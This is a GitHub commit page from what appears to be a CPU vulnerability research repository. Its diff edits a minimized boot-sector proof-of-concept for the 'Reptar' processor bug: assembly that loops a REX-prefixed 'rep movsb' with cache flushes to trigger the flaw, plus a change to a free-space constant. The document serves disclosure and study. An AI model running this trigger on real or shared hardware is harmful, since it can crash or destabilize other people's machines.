Skip to content

Commit

Permalink
give more space for payload
Browse files Browse the repository at this point in the history
  • Loading branch information
@sirdarckcat
sirdarckcat committed Dec 1, 2023
1 parent 6a6cae1 commit 2b3b816
Show file tree
Hide file tree
Showing 2 changed files with 25 additions and 25 deletions.
48 changes: 24 additions & 24 deletions pocs/cpus/reptar/minimized/reptar.boot.bin.asm
View file
Original file line number Diff line number Diff line change
@@ -1,28 +1,28 @@
%macro LONG_MODE_BOOT_PAYLOAD 0
xor rbx, rbx
.attack:
xor ecx, ecx
lea rsi, [rsp+1]
mov rdi, rsi
.many_reptars:
align 64
; 16 bytes
times 4 nop ; 4 bytes
dec rsi ; 3 bytes
dec rdi ; 3 bytes
inc rbx ; 3 bytes
inc rcx ; 3 bytes
; 16 bytes
clflush [rdi] ; 3 bytes
clflush [rsi+64] ; 4 bytes
;mov [rsp], rbx ; 4 bytes
rep ; 1 byte
db 0x44; rex.r ; 1 byte
movsb ; 1 byte
rep ; 1 byte
nop ; 1 byte
mov dil, bl ; counter
jmp .attack
xor rbx, rbx
.attack:
xor ecx, ecx
lea rsi, [rsp+1]
mov rdi, rsi
.many_reptars:
align 64
; 16 bytes
times 4 nop ; 4 bytes
dec rsi ; 3 bytes
dec rdi ; 3 bytes
inc rbx ; 3 bytes
inc rcx ; 3 bytes
; 16 bytes
clflush [rdi] ; 3 bytes
clflush [rsi+64] ; 4 bytes
;mov [rsp], rbx ; 4 bytes
rep ; 1 byte
db 0x44; rex.r ; 1 byte
movsb ; 1 byte
rep ; 1 byte
nop ; 1 byte
mov dil, bl ; counter
jmp .attack
%endmacro

%include "third_party/long_mode_boot.asm"
2 changes: 1 addition & 1 deletion pocs/cpus/reptar/minimized/third_party/long_mode_boot.asm
View file
Original file line number Diff line number Diff line change
Expand Up @@ -17,7 +17,7 @@
%endmacro
%endif

%define FREE_SPACE 0x9000
%define FREE_SPACE 0xF000
ORG 0x7C00
BITS 16
Expand Down

0 comments on commit 2b3b816

Please sign in to comment.